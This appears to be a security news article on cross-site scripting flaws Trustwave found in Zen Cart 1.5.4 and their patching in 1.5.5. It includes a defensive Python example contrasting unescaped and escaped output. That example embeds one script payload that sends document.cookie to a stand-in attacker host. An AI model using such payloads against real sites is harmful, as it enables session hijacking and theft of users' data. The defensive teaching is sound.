Multiple Cross-Site Scripting (XSS) vulnerabilities have been uncovered in the popular online open source shopping cart application, Zen Cart.
XSS allows an attacker to inject malicious client-side scripts into a website, which are then executed in victims' browsers when they visit it. There are several cross-site scripting variants, each of which can be used to craft different types of attacks. In this case, malicious XSS injections could let attackers gain access to cookies and sensitive information, and could enable site defacement, which can lead to further attacks.
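As an added illustration (not code from the article or from Zen Cart), the snippet below shows the root cause of a reflected XSS in a request parameter beside its fix, and the cookie flag that limits what a successful injection can read; the page fragment, the `sid` cookie name and the probe string are constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed probe string of the kind a scanner sends to a reflected parameter.
PROBE = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>'


def render_search_unsafe(keywords: str) -> str:
    """Vulnerable pattern: the request parameter is copied into HTML as-is."""
    return f"<p>Results for: {keywords}</p>"


def render_search_safe(keywords: str) -> str:
    """Fixed pattern: encode for the HTML text context before output.

    quote=True also encodes ' and ", which matters if the same value is ever
    placed inside an attribute; JavaScript or URL contexts need their own encoders.
    """
    return f"<p>Results for: {html.escape(keywords, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Defence in depth: HttpOnly keeps document.cookie from exposing the
    session token even if a script injection slips through; Secure keeps it
    off plaintext connections. 'sid' is a constructed cookie name."""
    cookie = SimpleCookie()
    cookie["sid"] = session_id
    cookie["sid"]["httponly"] = True
    cookie["sid"]["secure"] = True
    return cookie.output()


def contains_script_tag(fragment: str) -> bool:
    """Crude check used only to demonstrate the difference between the two renderers."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_search_unsafe(PROBE))   # script tag survives intact
    print(render_search_safe(PROBE))     # rendered as &lt;script&gt;...
    print(session_cookie_header("constructed-session-id"))
```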
According to Trustwave, the vulnerabilities affect Zen Cart 1.5.4 and potentially prior versions—there are both reflected and stored XSS in multiple parameters of a number of requests. All but one were discovered in the admin section of Zen Cart; the remaining issue is in the non-authenticated portion of the application.
The revelation is not so surprising: XSS vulnerabilities still top the open-source vulnerability heap. Based on the scanning of almost 400 open source web applications by the Netsparker security scanning engine, XSS accounts for 67% of all the identified vulnerabilities. SQL injection vulnerabilities were a distant second, amounting to 20% of the total. The remaining 13% were made up of remote and local file inclusions, CSRF, remote command execution, command injection, open redirection, HTTP header injection (web server software issue) and frame injection.
The credentials for the application and the URL were provided to Trustwave App Scanner, which then crawled through the application's many pages. Once an optimized set of pages had been crawled, the smart attacks were added and an assessment was run, which returned multiple vulnerabilities.
Zen Cart has patched all but one vulnerability in the new version 1.5.5—and has also released local patches in case an upgrade is not possible right away. A single XSS issue is still present in the application, but because the request is covered by CSRF protection, exploiting it would require Admin privileges for the application, Trustwave said.